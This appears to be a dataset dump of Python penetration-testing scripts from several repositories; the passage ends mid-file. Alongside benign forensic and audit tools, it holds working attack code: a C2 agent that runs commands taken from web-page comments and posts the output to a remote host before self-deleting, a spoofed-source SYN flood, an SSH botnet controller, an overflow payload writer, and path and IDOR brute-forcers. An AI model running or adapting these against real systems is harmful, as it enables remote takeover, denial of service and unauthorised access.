repo_name (string, 29 classes) | text (string, 18-367k chars) | avg_line_length (float64, 5.6-132) | max_line_length (int64, 11-3.7k) | alphanum_fraction (float64, 0.28-0.94)
---|---|---|---|---|
cybersecurity-penetration-testing | import mechanize
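# Probe sequential serviceid values and save any response that renders service details, flagging a possible insecure direct object reference.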
url = "http://www.webscantest.com/business/access.php?serviceid="
attackNumber = 1
for i in range(5):
res = mechanize.urlopen(url+str(i))
content = res.read()
# check if the content is accessible
if content.find("You service") > 0:
print "Possible Direct Object Reference"
output = open('response/'+str(attackNumber)+'.txt', 'w')
output.write(content)
output.close()
print attackNumber
attackNumber += 1
| 24.157895 | 65 | 0.656184 |
Penetration-Testing-with-Shellcode | #!/usr/bin/python
from struct import *
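# Overflow payload: 27 bytes of filler followed by the target return address 0x00401340 packed as a little-endian 64-bit value.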
buffer = ''
buffer += 'a'*27
buffer += pack("<Q", 0x00401340)
f = open("input.txt", "w")
f.write(buffer)
f.close()
| 17.875 | 33 | 0.6 |
Python-Penetration-Testing-for-Developers | import httplib
import shelve
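# Brute-force candidate PHP paths (stored under the 'php' key of the "mohit.raj" shelve) against the target and report those that return HTTP 200.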
url = raw_input("Enter the full URL ")
url1 =url.replace("http://","")
url2= url1.replace("/","")
s = shelve.open("mohit.raj",writeback=True)
for u in s['php']:
a = "/"
url_n = url2+a+u
print url_n
http_r = httplib.HTTPConnection(url2)
u=a+u
http_r.request("GET",u)
reply = http_r.getresponse()
if reply.status == 200:
print "\n URL found ---- ", url_n
ch = raw_input("Press c for continue : ")
if ch == "c" or ch == "C" :
continue
else :
break
s.close() | 19.48 | 43 | 0.606654 |
Python-Penetration-Testing-for-Developers | import time, dpkt
import plotly.plotly as py
from plotly.graph_objs import *
from datetime import datetime
filename = 'hbot.pcap'
full_datetime_list = []
dates = []
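# Record a timestamp for every packet in the capture sent to or from port 21 (FTP).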
for ts, pkt in dpkt.pcap.Reader(open(filename,'rb')):
eth=dpkt.ethernet.Ethernet(pkt)
if eth.type!=dpkt.ethernet.ETH_TYPE_IP:
continue
ip = eth.data
tcp=ip.data
if ip.p not in (dpkt.ip.IP_PROTO_TCP, dpkt.ip.IP_PROTO_UDP):
continue
if tcp.dport == 21 or tcp.sport == 21:
full_datetime_list.append((ts, str(time.ctime(ts))))
for t,d in full_datetime_list:
if d not in dates:
dates.append(d)
dates.sort(key=lambda date: datetime.strptime(date, "%a %b %d %H:%M:%S %Y"))
datecount = []
for d in dates:
counter = 0
for d1 in full_datetime_list:
if d1[1] == d:
counter += 1
datecount.append(counter)
data = Data([
Scatter(
x=dates,
y=datecount
)
])
plot_url = py.plot(data, filename='FTP Requests')
| 18.96 | 76 | 0.608826 |
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
import urllib
from anonBrowser import *
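# Query Google's AJAX web search API through the anonymised browser and print the raw JSON response.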
def google(search_term):
ab = anonBrowser()
search_term = urllib.quote_plus(search_term)
response = ab.open('http://ajax.googleapis.com/'+\
'ajax/services/search/web?v=1.0&q='+ search_term)
print response.read()
google('Boondock Saint')
| 19.411765 | 55 | 0.65896 |
PenetrationTestingScripts | #!/usr/bin/env python
#coding:utf-8
#Author:se55i0n
#Security checks against common SQL and NoSQL databases
import sys
import IPy
import time
import socket
import gevent
import argparse
from gevent import monkey
from multiprocessing.dummy import Pool as ThreadPool
from lib.config import *
from lib.exploit import *
monkey.patch_all()
class DBScanner(object):
def __init__(self, target, thread):
self.target = target
self.thread = thread
self.ips = []
self.ports = []
self.time = time.time()
self.get_ip()
self.get_port()
self.check = check()
def get_ip(self):
#Build the list of IP addresses in the target range to scan
for ip in IPy.IP(self.target):
self.ips.append(str(ip))
def get_port(self):
self.ports = list(p for p in service.itervalues())
def scan(self, ip, port):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(0.2)
if s.connect_ex((ip, port)) == 0:
self.handle(ip, port)
except Exception as e:
pass
finally:
s.close()
def handle(self, ip, port):
for v,k in service.iteritems():
if k == str(port):
if v == 'mysql':
self.check.mysql(ip)
elif v == 'mssql':
self.check.mssql(ip)
elif v == 'oracle':
self.check.oracle(ip)
elif v == 'postgresql':
self.check.postgresql(ip)
elif v == 'redis':
self.check.redis(ip)
elif v == 'mongodb':
self.check.mongodb(ip)
elif v == 'memcached':
self.check.memcached(ip)
else:
self.check.elasticsearch(ip)
def start(self, ip):
try:
gevents = []
for port in self.ports:
gevents.append(gevent.spawn(self.scan, ip, int(port)))
gevent.joinall(gevents)
except Exception as e:
pass
def run(self):
try:
pool = ThreadPool(processes=self.thread)
pool.map_async(self.start, self.ips).get(0xffff)
pool.close()
pool.join()
except Exception as e:
pass
except KeyboardInterrupt:
print u'\n{}[-] Scan aborted by user...{}'.format(R, W)
sys.exit(1)
finally:
print '-'*55
print u'{}[+] Scan finished in {} seconds.{}'.format(O, time.time()-self.time, W)
def banner():
banner = '''
____ ____ _____
/ __ \/ __ ) ___/_________ _____ ____ ___ _____
/ / / / __ \__ \/ ___/ __ `/ __ \/ __ \/ _ \/ ___/
/ /_/ / /_/ /__/ / /__/ /_/ / / / / / / / __/ /
/_____/_____/____/\___/\__,_/_/ /_/_/ /_/\___/_/
'''
print B + banner + W
print '-'*55
def main():
banner()
parser = argparse.ArgumentParser(description='Example: python {} 192.168.1.0/24'.format(sys.argv[0]))
parser.add_argument('target', help=u'192.168.1.0/24')
parser.add_argument('-t', type=int, default=50, dest='thread', help=u'number of threads (default 50)')
args = parser.parse_args()
myscan = DBScanner(args.target, args.thread)
myscan.run()
if __name__ == '__main__':
main()
| 22.570175 | 102 | 0.584885 |
PenetrationTestingScripts | #!/usr/bin/env python
#
# https://github.com/git/git/blob/master/Documentation/technical/index-format.txt
#
import binascii
import collections
import mmap
import struct
import sys
def check(boolean, message):
if not boolean:
import sys
print "error: " + message
sys.exit(1)
def parse(filename, pretty=True):
with open(filename, "rb") as o:
f = mmap.mmap(o.fileno(), 0, access=mmap.ACCESS_READ)
def read(format):
# "All binary numbers are in network byte order."
# Hence "!" = network order, big endian
format = "! " + format
bytes = f.read(struct.calcsize(format))
return struct.unpack(format, bytes)[0]
index = collections.OrderedDict()
# 4-byte signature, b"DIRC"
index["signature"] = f.read(4).decode("ascii")
check(index["signature"] == "DIRC", "Not a Git index file")
# 4-byte version number
index["version"] = read("I")
check(index["version"] in {2, 3},
"Unsupported version: %s" % index["version"])
# 32-bit number of index entries, i.e. 4-byte
index["entries"] = read("I")
yield index
for n in range(index["entries"]):
entry = collections.OrderedDict()
entry["entry"] = n + 1
entry["ctime_seconds"] = read("I")
entry["ctime_nanoseconds"] = read("I")
if pretty:
entry["ctime"] = entry["ctime_seconds"]
entry["ctime"] += entry["ctime_nanoseconds"] / 1000000000
del entry["ctime_seconds"]
del entry["ctime_nanoseconds"]
entry["mtime_seconds"] = read("I")
entry["mtime_nanoseconds"] = read("I")
if pretty:
entry["mtime"] = entry["mtime_seconds"]
entry["mtime"] += entry["mtime_nanoseconds"] / 1000000000
del entry["mtime_seconds"]
del entry["mtime_nanoseconds"]
entry["dev"] = read("I")
entry["ino"] = read("I")
# 4-bit object type, 3-bit unused, 9-bit unix permission
entry["mode"] = read("I")
if pretty:
entry["mode"] = "%06o" % entry["mode"]
entry["uid"] = read("I")
entry["gid"] = read("I")
entry["size"] = read("I")
entry["sha1"] = binascii.hexlify(f.read(20)).decode("ascii")
entry["flags"] = read("H")
# 1-bit assume-valid
entry["assume-valid"] = bool(entry["flags"] & (0b10000000 << 8))
# 1-bit extended, must be 0 in version 2
entry["extended"] = bool(entry["flags"] & (0b01000000 << 8))
# 2-bit stage (?)
stage_one = bool(entry["flags"] & (0b00100000 << 8))
stage_two = bool(entry["flags"] & (0b00010000 << 8))
entry["stage"] = stage_one, stage_two
# 12-bit name length, if the length is less than 0xFFF (else, 0xFFF)
namelen = entry["flags"] & 0xFFF
# 62 bytes so far
entrylen = 62
if entry["extended"] and (index["version"] == 3):
entry["extra-flags"] = read("H")
# 1-bit reserved
entry["reserved"] = bool(entry["extra-flags"] & (0b10000000 << 8))
# 1-bit skip-worktree
entry["skip-worktree"] = bool(entry["extra-flags"] & (0b01000000 << 8))
# 1-bit intent-to-add
entry["intent-to-add"] = bool(entry["extra-flags"] & (0b00100000 << 8))
# 13-bits unused
# used = entry["extra-flags"] & (0b11100000 << 8)
# check(not used, "Expected unused bits in extra-flags")
entrylen += 2
if namelen < 0xFFF:
entry["name"] = f.read(namelen).decode("utf-8", "replace")
entrylen += namelen
else:
# Do it the hard way
name = []
while True:
byte = f.read(1)
if byte == "\x00":
break
name.append(byte)
entry["name"] = b"".join(name).decode("utf-8", "replace")
entrylen += 1
padlen = (8 - (entrylen % 8)) or 8
nuls = f.read(padlen)
check(set(nuls) == set(['\x00']), "padding contained non-NUL")
yield entry
f.close()
| 32.441176 | 87 | 0.488674 |
owtf | """
owtf.__main__
~~~~~~~~~~~~~
A __main__ method for OWTF so that internal services can be called as Python modules.
"""
import sys
from owtf.core import main
if __name__ == "__main__":
main()
| 15.75 | 85 | 0.595 |
cybersecurity-penetration-testing | #!/usr/bin/env python
from datetime import datetime
from matplotlib.dates import DateFormatter
import matplotlib.pyplot as plt
import os
from os.path import join
import sys
# max. number of bars on the histogram
NUM_BINS = 200
def gen_filestats(basepath):
"""Collects metadata about a directory tree.
Arguments:
basepath -- root directory to start from
Returns:
Tuple with list of file names and list of
stat results."""
filenames = []
filestats = []
for root, dirs, files in os.walk(basepath):
for f in files:
fullname = join(root, f)
filenames.append(fullname)
filestats.append(os.lstat(fullname))
return (filenames, filestats)
def show_date_histogram(times, heading='', block=False):
"""Draws and displays a histogram over the given timestamps.
Arguments:
times -- array of time stamps as seconds since 1970-01-01
heading -- heading to write to the drawing"""
fig, ax = plt.subplots()
times = map(lambda x: datetime.fromtimestamp(x).toordinal(), times)
ax.hist(times, NUM_BINS)
plt.xlabel('Date')
plt.ylabel('# of files')
plt.title(heading)
ax.autoscale_view()
ax.xaxis.set_major_formatter(DateFormatter('%Y-%m-%d'))
fig.autofmt_xdate()
fig.show()
if block:
plt.show()
if __name__ == '__main__':
if len(sys.argv) < 2:
print 'Usage %s base_directory' % sys.argv[0]
sys.exit(1)
path = sys.argv[1]
(names, stats) = gen_filestats(path)
# extract time stamps
mtimes = map(lambda x: x.st_mtime, stats)
atimes = map(lambda x: x.st_atime, stats)
show_date_histogram(mtimes, 'mtimes of ' + path)
show_date_histogram(atimes, 'atimes of ' + path, True)
| 22.84 | 71 | 0.634024 |
AggressorAssessor | #!/usr/bin/env python
import argparse
import smtplib
from email.MIMEMultipart import MIMEMultipart
from email.MIMEText import MIMEText
parser = argparse.ArgumentParser(description='beacon info')
parser.add_argument('--computer')
parser.add_argument('--ip')
args = parser.parse_args()
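# Build an email-to-SMS alert carrying the new beacon's hostname and internal IP, then deliver it through Gmail's SMTP server.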
fromaddr = "<gmaile-mailaccounthere>"
toaddr = ["7777777777@txt.att.net", "8888888888@vtext.com"]
msg = MIMEMultipart()
msg['From'] = fromaddr
msg['To'] = ", ".join(toaddr)
msg['Subject'] = "INCOMING BEACON"
hostname = args.computer
internal_ip = args.ip
body = "Check your teamserver! \nHostname - " + hostname + "\nInternal IP - " + internal_ip
msg.attach(MIMEText(body, 'plain'))
server = smtplib.SMTP('smtp.gmail.com', 587)
server.starttls()
server.login(fromaddr, "<gmailpasswordhere>")
text = msg.as_string()
server.sendmail(fromaddr, toaddr, text)
server.quit()
| 25.875 | 91 | 0.733411 |
Effective-Python-Penetration-Testing | from capstone import *
import pefile
pe = pefile.PE('md5sum.exe')
entryPoint = pe.OPTIONAL_HEADER.AddressOfEntryPoint
data = pe.get_memory_mapped_image()[entryPoint:]
cs = Cs(CS_ARCH_X86, CS_MODE_32)
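# Disassemble the bytes at the PE entry point as 32-bit x86 and print each instruction's address, mnemonic and operands.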
for i in cs.disasm(data, 0x1000):
print("0x%x:\t%s\t%s" %(i.address, i.mnemonic, i.op_str))
| 22.153846 | 61 | 0.7 |
Python-Penetration-Testing-for-Developers | import random
from scapy.all import *
target = raw_input("Enter the Target IP ")
i=1
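# Send SYN packets to port 80 of the target from spoofed source IPs, switching to a freshly randomised source address every 50 packets.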
while True:
a = str(random.randint(1,254))
b = str(random.randint(1,254))
c = str(random.randint(1,254))
d = str(random.randint(1,254))
dot = "."
src = a+dot+b+dot+c+dot+d
print src
st = random.randint(1,1000)
en = random.randint(1000,65535)
loop_break = 0
for srcport in range(st,en):
IP1 = IP(src=src, dst=target)
TCP1 = TCP(sport=srcport, dport=80)
pkt = IP1 / TCP1
send(pkt,inter= .0001)
print "packet sent ", i
loop_break = loop_break+1
i=i+1
if loop_break ==50 :
break
| 21 | 42 | 0.649241 |
cybersecurity-penetration-testing | #!/usr/bin/python
import re
import sys
def read_passwd(filename):
"""Reads entries from shadow or passwd files and
returns the content as list of entries.
Every entry is a list of fields."""
content = []
with open(filename, 'r') as f:
for line in f:
entry = line.strip().split(':')
content.append(entry)
return content
def detect_aliases(passwd):
"""Prints users who share a user id on the console
Arguments:
passwd -- contents of /etc/passwd as read by read_passwd"""
id2user = {}
for entry in passwd:
username = entry[0]
uid = entry[2]
if uid in id2user:
print 'User "%s" is an alias for "%s" with uid=%s' % (username, id2user[uid], uid)
else:
id2user[uid] = username
def detect_missing_users(passwd, shadow):
"""Prints users of /etc/passwd missing in /etc/shadow
and vice versa.
Arguments:
passwd -- contents of /etc/passwd as read by read_passwd
shadow -- contents of /etc/shadow as read by read_passwd"""
passwd_users = set([e[0] for e in passwd])
shadow_users = set([e[0] for e in shadow])
missing_in_passwd = shadow_users - passwd_users
if len(missing_in_passwd) > 0:
print 'Users missing in passwd: %s' % ', '.join(missing_in_passwd)
missing_in_shadow = passwd_users - shadow_users
if len(missing_in_shadow) > 0:
print 'Users missing in shadow: %s' % ', '.join(missing_in_shadow)
def detect_unshadowed(passwd, shadow):
"""Prints users who are not using shadowing or have no password set
Arguments:
passwd -- contents of /etc/passwd as read by read_passwd"""
nopass = [e[0] for e in passwd if e[1]=='']
nopass.extend([e[0] for e in shadow if e[1]==''])
if len(nopass) > 0:
print 'Users without password: %s' % ', '.join(nopass)
unshadowed = [e[0] for e in passwd if e[1] != 'x' and e[1] != '']
if len(unshadowed) > 0:
print 'Users not using password-shadowing: %s' % \
', '.join(unshadowed)
def detect_deviating_hashing(shadow):
"""Prints users with non-standard hash methods for passwords
Arguments:
shadow -- contents of /etc/shadow as read by read_passwd"""
noalgo = set()
salt2user = {}
algorithms = set()
for entry in shadow:
pwhash = entry[1]
if len(pwhash) < 3:
continue
m = re.search(r'^\$([^$]{1,2})\$([^$]+)\$', pwhash)
if not m:
noalgo.add(entry[0])
continue
algo = m.group(1)
salt = m.group(2)
if salt in salt2user:
print 'Users "%s" and "%s" share same password salt "%s"' % \
(salt2user[salt], entry[0], salt)
else:
salt2user[salt] = entry[0]
algorithms.add(algo)
if len(algorithms) > 1:
print 'Multiple hashing algorithms found: %s' % ', '.join(algorithms)
if len(noalgo) > 0:
print 'Users without hash algorithm spec. found: %s' % \
', '.join(noalgo)
if __name__ == '__main__':
if len(sys.argv) < 3:
print 'Usage %s /path/to/passwd /path/to/shadow' % sys.argv[0]
sys.exit(1)
passwd = read_passwd(sys.argv[1])
shadow = read_passwd(sys.argv[2])
detect_aliases(passwd)
detect_missing_users(passwd, shadow)
detect_unshadowed(passwd, shadow)
detect_deviating_hashing(shadow)
| 28.487395 | 94 | 0.572976 |
owtf | """
Plugin for probing mssql
"""
from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = " MsSql Probing "
def run(PluginInfo):
resource = get_resources("BruteMsSqlProbeMethods")
return plugin_helper.CommandDump("Test Command", "Output", resource, PluginInfo, [])
| 24.230769 | 88 | 0.752294 |
owtf | """
owtf.net.scanner
~~~~~~~~~~~~~~~~
The scan_network method scans the network for open ports and calls network plugins for the services running on the target
"""
import logging
import re
from owtf.config import config_handler
from owtf.db.session import get_scoped_session
from owtf.managers.plugin import get_plugins_by_group
from owtf.settings import NET_SCANS_PATH
from owtf.shell.base import shell
from owtf.utils.file import FileOperations
__all__ = ["Scanner"]
# Folder under which all scans will be saved
PING_SWEEP_FILE = "{}/00_ping_sweep".format(NET_SCANS_PATH)
DNS_INFO_FILE = "{}/01_dns_info".format(NET_SCANS_PATH)
FAST_SCAN_FILE = "{}/02_fast_scan".format(NET_SCANS_PATH)
STD_SCAN_FILE = "{}/03_std_scan".format(NET_SCANS_PATH)
FULL_SCAN_FILE = "{}/04_full_scan".format(NET_SCANS_PATH)
class Scanner(object):
def __init__(self):
self.shell = shell
self.session = get_scoped_session()
# Create the missing scans folder inside the owtf_review directory.
FileOperations.create_missing_dirs(NET_SCANS_PATH)
def ping_sweep(self, target, scantype):
"""Do a ping sweep
:param target: Target to scan
:type target: `str`
:param scantype: Type of scan
:type scantype: `str`
:return: None
:rtype: None
"""
if scantype == "full":
logging.info("Performing Intense Host discovery")
self.shell.shell_exec(
"nmap -n -v -sP -PE -PP -PS21,22,23,25,80,443,113,21339 -PA80,113,443,10042"
" --source_port 53 {!s} -oA {!s}".format(target, PING_SWEEP_FILE)
)
if scantype == "arp":
logging.info("Performing ARP host discovery")
self.shell.shell_exec(
"nmap -n -v -sP -PR {!s} -oA {!s}".format(target, PING_SWEEP_FILE)
)
self.shell.shell_exec(
'grep Up {!s}.gnmap | cut -f2 -d" " > {!s}.ips'.format(
PING_SWEEP_FILE, PING_SWEEP_FILE
)
)
def dns_sweep(self, file_with_ips, file_prefix):
"""Do a DNS sweep
:param file_with_ips: Path of file with IP addresses
:type file_with_ips: `str`
:param file_prefix: File name prefix
:type file_prefix: `str`
:return: None
:rtype: None
"""
logging.info(
"Finding misconfigured DNS servers that might allow zone transfers among live ips .."
)
self.shell.shell_exec(
"nmap -PN -n -sS -p 53 -iL {!s} -oA {!s}".format(file_with_ips, file_prefix)
)
# Step 2 - Extract IPs
dns_servers = "{!s}.dns_server.ips".format(file_prefix)
self.shell.shell_exec(
'grep "53/open/tcp" {!s}.gnmap | cut -f 2 -d " " > {!s}'.format(
file_prefix, dns_servers
)
)
file = FileOperations.open(dns_servers)
domain_names = "{!s}.domain_names".format(file_prefix)
self.shell.shell_exec("rm -f {!s}".format(domain_names))
num_dns_servers = 0
for line in file:
if line.strip("\n"):
dns_server = line.strip("\n")
self.shell.shell_exec(
"host {} {} | grep 'domain name' | cut -f 5 -d' ' | cut -f 2,3,4,5,6,7 -d. "
"| sed 's/\.$//' >> {}".format(dns_server, dns_server, domain_names)
)
num_dns_servers += 1
try:
file = FileOperations.open(domain_names, owtf_clean=False)
except IOError:
return
for line in file:
domain = line.strip("\n")
raw_axfr = "{!s}.{!s}.{!s}.axfr.raw".format(file_prefix, dns_server, domain)
self.shell.shell_exec(
"host -l {!s} {!s} | grep {!s} > {!s}".format(
domain, dns_server, domain, raw_axfr
)
)
success = self.shell.shell_exec(
"wc -l {!s} | cut -f 1 -d ' '".format(raw_axfr)
)
if success > 3:
logging.info(
"Attempting zone transfer on $dns_server using domain {!s}.. Success!".format(
domain
)
)
axfr = "{!s}.{!s}.{!s}.axfr".format(file_prefix, dns_server, domain)
self.shell.shell_exec("rm -f {!s}".format(axfr))
logging.info(
self.shell.shell_exec(
"grep 'has address' {!s} | cut -f 1,4 -d ' ' | sort -k 2 -t ' ' "
"| sed 's/ /#/g'".format(raw_axfr)
)
)
else:
logging.info(
"Attempting zone transfer on $dns_server using domain %s.. Success!",
domain,
)
self.shell.shell_exec("rm -f {!s}".format(raw_axfr))
if num_dns_servers == 0:
return
def scan_and_grab_banners(
self, file_with_ips, file_prefix, scan_type, nmap_options
):
"""Scan targets and grab service banners
:param file_with_ips: Path to file with IPs
:type file_with_ips: `str`
:param file_prefix: File name prefix
:type file_prefix: `str`
:param scan_type: Type of scan
:type scan_type: `str`
:param nmap_options: nmap options
:type nmap_options: `str`
:return: None
:rtype: None
"""
if scan_type == "tcp":
logging.info(
"Performing TCP portscan, OS detection, Service detection, banner grabbing, etc"
)
self.shell.shell_exec(
"nmap -PN -n -v --min-parallelism=10 -iL {!s} -sS -sV -O -oA {!s}.tcp {!s}".format(
file_with_ips, file_prefix, nmap_options
)
)
self.shell.shell_exec(
"amap -1 -i {!s}.tcp.gnmap -Abq -m -o {!s}.tcp.amap -t 90 -T 90 -c 64".format(
file_prefix, file_prefix
)
)
if scan_type == "udp":
logging.info(
"Performing UDP portscan, Service detection, banner grabbing, etc"
)
self.shell.shell_exec(
"nmap -PN -n -v --min-parallelism=10 -iL {!s} -sU -sV -O -oA {!s}.udp {!s}".format(
file_with_ips, file_prefix, nmap_options
)
)
self.shell.shell_exec(
"amap -1 -i {}.udp.gnmap -Abq -m -o {}.udp.amap".format(
file_prefix, file_prefix
)
)
@staticmethod
def get_nmap_services_file():
"""Return default NMAP services file
:return: Path to the file
:rtype: `str`
"""
return "/usr/share/nmap/nmap-services"
def get_ports_for_service(self, service, protocol):
"""Get ports for different services
:param service: Service name
:type service: `str`
:param protocol: Protocol
:type protocol: `str`
:return: List of ports
:rtype: `list`
"""
regexp = "(.*?)\t(.*?/.*?)\t(.*?)($|\t)(#.*){0,1}"
re.compile(regexp)
list = []
f = FileOperations.open(self.get_nmap_services_file())
for line in f.readlines():
if line.lower().find(service) >= 0:
match = re.findall(regexp, line)
if match:
port = match[0][1].split("/")[0]
prot = match[0][1].split("/")[1]
if not protocol or protocol == prot and port not in list:
list.append(port)
f.close()
return list
def target_service(self, nmap_file, service):
"""Services for a target
:param nmap_file: Path to nmap file
:type nmap_file: `str`
:param service: Service to get
:type service: `str`
:return: Response
:rtype: `str`
"""
ports_for_service = self.get_ports_for_service(service, "")
f = FileOperations.open(nmap_file.strip())
response = ""
for host_ports in re.findall("Host: (.*?)\tPorts: (.*?)[\t\n]", f.read()):
host = host_ports[0].split(" ")[0] # Remove junk at the end
ports = host_ports[1].split(",")
for port_info in ports:
if len(port_info) < 1:
continue
chunk = port_info.split("/")
port = chunk[0].strip()
port_state = chunk[1].strip()
# No point in wasting time probing closed/filtered ports!!
# (nmap sometimes adds these to the gnmap file for some reason ..)
if port_state in ["closed", "filtered"]:
continue
try:
prot = chunk[2].strip()
except BaseException:
continue
if port in ports_for_service:
response += "{!s}:{!s}:{!s}##".format(host, port, prot)
f.close()
return response
def probe_service_for_hosts(self, nmap_file, target):
"""Probe a service for a domain
:param nmap_file: Path to nmap file
:type nmap_file: `str`
:param target: Target name
:type target: `str`
:return: List of services
:rtype: `list`
"""
services = []
# Get all available plugins from network plugin order file
net_plugins = get_plugins_by_group(self.session, plugin_group="network")
for plugin in net_plugins:
services.append(plugin["Name"])
services.append("http")
total_tasks = 0
tasklist = ""
plugin_list = []
http = []
for service in services:
if plugin_list.count(service) > 0:
continue
tasks_for_service = len(
self.target_service(nmap_file, service).split("##")
) - 1
total_tasks += tasks_for_service
tasklist = "{!s} [ {!s} - {!s} tasks ]".format(
tasklist, service, str(tasks_for_service)
)
for line in self.target_service(nmap_file, service).split("##"):
if line.strip("\n"):
ip = line.split(":")[0]
port = line.split(":")[1]
plugin_to_invoke = service
service1 = plugin_to_invoke
config_handler.set(
"{!s}_PORT_NUMBER".format(service1.upper()), port
)
if service != "http":
plugin_list.append(plugin_to_invoke)
http.append(port)
logging.info(
"We have to probe %s:%s for service %s",
str(ip),
str(port),
plugin_to_invoke,
)
return http
def scan_network(self, target):
"""Do a ping sweep for a target
:param target: Target url
:type target: `str`
:return: None
:rtype: None
"""
self.ping_sweep(target.split("//")[1], "full")
self.dns_sweep("{}.ips".format(PING_SWEEP_FILE), DNS_INFO_FILE)
def probe_network(self, target, protocol, port):
"""Probe network for services
:param target: target url
:type target: `str`
:param protocol: Protocol scan
:type protocol: `str`
:param port: Port number for target
:type port: `str`
:return: List of services running
:rtype: list
"""
self.scan_and_grab_banners(
"{0}.ips".format(PING_SWEEP_FILE),
FAST_SCAN_FILE,
protocol,
"-p" + str(port),
)
return self.probe_service_for_hosts(
"{0}.{1}.gnmap".format(FAST_SCAN_FILE, protocol), target.split("//")[1]
)
| 35.161194 | 120 | 0.495253 |
cybersecurity-penetration-testing | import requests
import re
import subprocess
import time
import os
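# Poll the page for HTML comments, run each one as a shell command, and post the base64-encoded output back to the guestbook; a whitespace-only comment tells the agent to delete itself.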
while 1:
req = requests.get("http://127.0.0.1")
comments = re.findall('<!--(.*)-->',req.text)
for comment in comments:
if comment == " ":
os.remove(__file__)
else:
try:
response = subprocess.check_output(comment.split())
except:
response = "command fail"
data={"comment":(''.join(response)).encode("base64")}
newreq = requests.post("http://127.0.0.1notmalicious.com/xss/easy/addguestbookc2.php ", data=data)
time.sleep(30)
| 23.666667 | 99 | 0.667311 |
owtf | class BaseWorker(object):
pass
| 11 | 25 | 0.714286 |
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
import optparse
import pxssh
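# Minimal SSH botnet controller: each Client holds a pxssh session, and botnetCommand runs the same command on every enrolled host.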
class Client:
def __init__(self, host, user, password):
self.host = host
self.user = user
self.password = password
self.session = self.connect()
def connect(self):
try:
s = pxssh.pxssh()
s.login(self.host, self.user, self.password)
return s
except Exception, e:
print e
print '[-] Error Connecting'
def send_command(self, cmd):
self.session.sendline(cmd)
self.session.prompt()
return self.session.before
def botnetCommand(command):
for client in botNet:
output = client.send_command(command)
print '[*] Output from ' + client.host
print '[+] ' + output
def addClient(host, user, password):
client = Client(host, user, password)
botNet.append(client)
botNet = []
addClient('127.0.0.1', 'root', 'toor')
addClient('127.0.0.1', 'root', 'toor')
addClient('127.0.0.1', 'root', 'toor')
botnetCommand('uname -v')
botnetCommand('cat /etc/issue')
| 21.489796 | 56 | 0.584015 |
Python-Penetration-Testing-Cookbook | from urllib2 import urlopen
from xml.etree.ElementTree import parse
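# Fetch the TechCrunch/Google RSS feed, save the raw XML, and print the title, description, date and link of every item.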
url = urlopen('http://feeds.feedburner.com/TechCrunch/Google')
xmldoc = parse(url)
xmldoc.write('output.xml')
for item in xmldoc.iterfind('channel/item'):
title = item.findtext('title')
desc = item.findtext('description')
date = item.findtext('pubDate')
link = item.findtext('link')
print title
print desc
print date
print link
print '---------'
| 24.166667 | 62 | 0.681416 |
cybersecurity-penetration-testing | import os
import sys
import logging
import argparse
import plugins
import writers
import colorama
from datetime import datetime
from pyfiglet import Figlet
colorama.init()
__author__ = 'Preston Miller & Chapin Bryce'
__date__ = '20160401'
__version__ = 0.01
__description__ = 'This script is our framework controller and handles each plugin'
class Framework(object):
def __init__(self, input_directory, output_directory, log, **kwargs):
self.input = input_directory
self.output = output_directory
logging.basicConfig(filename=log, level=logging.DEBUG,
format='%(asctime)s | %(levelname)s | %(message)s', filemode='a')
self.log = logging.getLogger(log)
self.kwargs = kwargs
def run(self):
msg = 'Initializing framework v' + str(__version__)
print '[+]', msg
self.log.info(msg)
f = Figlet(font='doom')
print f.renderText('Framework')
self.log.debug('System ' + sys.platform)
self.log.debug('Version ' + sys.version)
if not os.path.exists(self.output):
os.makedirs(self.output)
self._list_files()
self._run_plugins()
def _list_files(self):
msg = 'Indexing {}'.format(self.input)
print '[+]', msg
logging.info(msg)
self.wal_files = []
self.setupapi_files = []
self.userassist_files = []
self.exif_metadata = []
self.office_metadata = []
self.id3_metadata = []
self.pst_files = []
for root, subdir, files in os.walk(self.input, topdown=True):
for file_name in files:
current_file = os.path.join(root, file_name)
current_file = current_file.decode('utf-8').lower()
if not os.path.isfile(current_file):
logging.warning(u"Could not parse file {}... Skipping...".format((current_file)))
continue
ext = os.path.splitext(current_file)[1]
if current_file.endswith('ntuser.dat'):
self.userassist_files.append(current_file)
elif 'setupapi.dev.log' in current_file:
self.setupapi_files.append(current_file)
elif ext == '.jpeg' or ext == '.jpg':
self.exif_metadata.append(current_file)
elif ext == '.docx' or ext == '.pptx' or ext == '.xlsx':
self.office_metadata.append(current_file)
elif ext == '.mp3':
self.id3_metadata.append(current_file)
elif ext == '.pst':
self.pst_files.append(current_file)
elif ext.endswith('-wal'):
self.wal_files.append(current_file)
else:
continue
def _run_plugins(self):
# Run Wal Crawler
if len(self.wal_files) > 0:
wal_plugin = Framework.Plugin('wal_crawler', self.wal_files, self.log)
wal_output = os.path.join(self.output, 'wal')
wal_plugin.run(plugins.wal_crawler.main)
if self.kwargs['excel'] is True:
wal_plugin.write(wal_output, recursion=1, excel=1)
else:
wal_plugin.write(wal_output, recursion=1)
# Run Setupapi Parser
if len(self.setupapi_files) > 0:
setupapi_plugin = Framework.Plugin('setupapi', self.setupapi_files, self.log)
setupapi_output = os.path.join(self.output, 'setupapi')
setupapi_plugin.run(plugins.setupapi.main)
if self.kwargs['excel'] is True:
setupapi_plugin.write(setupapi_output, recursion=1, excel=1)
else:
setupapi_plugin.write(setupapi_output, recursion=1)
# Run Userassist Parser
if len(self.userassist_files) > 0:
userassist_plugin = Framework.Plugin('userassist', self.userassist_files, self.log)
userassist_output = os.path.join(self.output, 'userassist')
userassist_plugin.run(plugins.userassist.main)
if self.kwargs['excel'] is True:
userassist_plugin.write(userassist_output, recursion=1, excel=1)
else:
userassist_plugin.write(userassist_output, recursion=1)
# Run EXIF metadata parser
if len(self.exif_metadata) > 0:
exif_metadata_plugin = Framework.Plugin('exif_metadata', self.exif_metadata, self.log)
exif_metadata_output = os.path.join(self.output, 'metadata')
exif_metadata_plugin.run(plugins.exif.main)
if self.kwargs['excel'] is True:
exif_metadata_plugin.write(exif_metadata_output, excel=1)
else:
exif_metadata_plugin.write(exif_metadata_output)
# Run office metadata parser
if len(self.office_metadata) > 0:
office_metadata_plugin = Framework.Plugin('office_metadata', self.office_metadata, self.log)
office_metadata_output = os.path.join(self.output, 'metadata')
office_metadata_plugin.run(plugins.office.main)
if self.kwargs['excel'] is True:
